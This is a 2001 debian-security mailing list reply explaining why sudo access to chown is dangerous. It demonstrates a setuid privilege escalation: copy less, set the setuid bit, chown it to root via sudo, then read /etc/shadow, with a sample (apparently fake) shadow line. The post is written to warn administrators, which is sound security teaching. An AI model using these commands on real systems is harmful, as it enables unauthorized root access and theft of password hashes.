Re: Sudo and Chown?

To: "'debian-security@lists.debian.org'" <debian-security@lists.debian.org>
Subject: Re: Sudo and Chown?
From: Jason Healy <jhealy@logn.net>
Date: Thu, 12 Jul 2001 20:19:01 -0400
Message-id: <[🔎] 20010712201901.A2700@logn.net>
Mail-followup-to: "'debian-security@lists.debian.org'" <debian-security@lists.debian.org>
In-reply-to: <[🔎] 1D419C6A55E3D4119D310002A50900C81D18B6@OINGOEX0>
References: <[🔎] 1D419C6A55E3D4119D310002A50900C81D18B6@OINGOEX0>

At 994972732s since epoch (07/12/01 19:18:52 -0400 UTC), Paul Socolow wrote:
> I would like to give a user the ability to chown files in certain
> directories to other users ownership.

As per earlier discussions about sudo, it's very difficult to give
'limited' sudo access.

Even if you fix the hard-linking problem, consider the following fun
that a user with sudo chown access could have:

# cp /usr/bin/less ./
# chmod a+s ./less
# sudo chown root.root ./less
# ls -l less

-rwsr-sr-x    1 root     root        79516 Jul 12 20:11 less

(uh-oh)

# ./less /etc/shadow
root:$gfv49$Q923JVbmn.932cj9%bogus:11481:0:99999:7:::
daemon:*:11405:0:99999:7:::
...

DOH!  I'm sure you can use your imagination for other fun programs to
SUID... =)

chmod/chown are extremely dangerous binaries to give root privs on, as
they essentially give you the ability to setuid anything to root.
That said, most binaries can be dangerous when given root privs (bash,
cat, echo, rm, cp, mv, tar).

Be very, very careful.

Jason

--
Jason Healy    |     jhealy@logn.net
LogN Systems   |   http://www.logn.net/

Reply to:

Follow-Ups:
- Re: Sudo and Chown?
  - From: Vineet Kumar <debian-security@virtual.doorstop.net>

References:
- Sudo and Chown?
  - From: Paul Socolow <paul@appliedsemantics.com>

Prev by Date: Re: Sudo and Chown?
Next by Date: Re: Sudo and Chown?
Previous by thread: Re: Sudo and Chown?
Next by thread: Re: Sudo and Chown?
Index(es):
- Date
- Thread